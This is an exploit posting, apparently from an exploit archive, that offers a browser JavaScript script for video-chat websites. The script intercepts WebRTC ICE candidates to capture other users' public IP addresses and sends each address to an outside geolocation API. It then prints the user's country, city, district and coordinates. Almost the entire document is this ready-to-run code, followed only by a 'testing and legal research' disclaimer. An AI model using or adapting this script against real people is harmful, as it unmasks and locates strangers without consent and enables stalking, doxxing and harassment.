Below is a copy: P2P Communication Vulnerability (IP-Tracking)
# Exploit Title: P2P Communication Vulnerability (IP-Tracking)
# Date: 01/04/2021
# Exploit Author: Tobias Marcotto
# Tested on: Kali Linux x64
# Description: Due to the peer-to-peer (P2P) communication vulnerability on videochat websites, it is possible to find out every IP address of every user!!!
*********************************************************************************************************
// BY TOBIAS MARCOTTO
let apiKey = "API-KEY";
window.oRTCPeerConnection =
window.oRTCPeerConnection || window.RTCPeerConnection;
window.RTCPeerConnection = function (...args) {
const pc = new window.oRTCPeerConnection(...args);
pc.oaddIceCandidate = pc.addIceCandidate;
pc.addIceCandidate = function (iceCandidate, ...rest) {
const fields = iceCandidate.candidate.split(" ");
console.log(iceCandidate.candidate);
const ip = fields[4];
if (fields[7] === "srflx") {
getLocation(ip);
}
return pc.oaddIceCandidate(iceCandidate, ...rest);
};
return pc;
};
let getLocation = async (ip) => {
let url = `https://api.ipgeolocation.io/ipgeo?apiKey=${apiKey}&ip=${ip}`;
await fetch(url).then((response) =>
response.json().then((json) => {
const output = `
---------------------
Country: ${json.country_name}
State: ${json.state_prov}
City: ${json.city}
District: ${json.district}
Lat / Long: (${json.latitude}, ${json.longitude})
---------------------
`;
console.log(output);
})
);
};
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum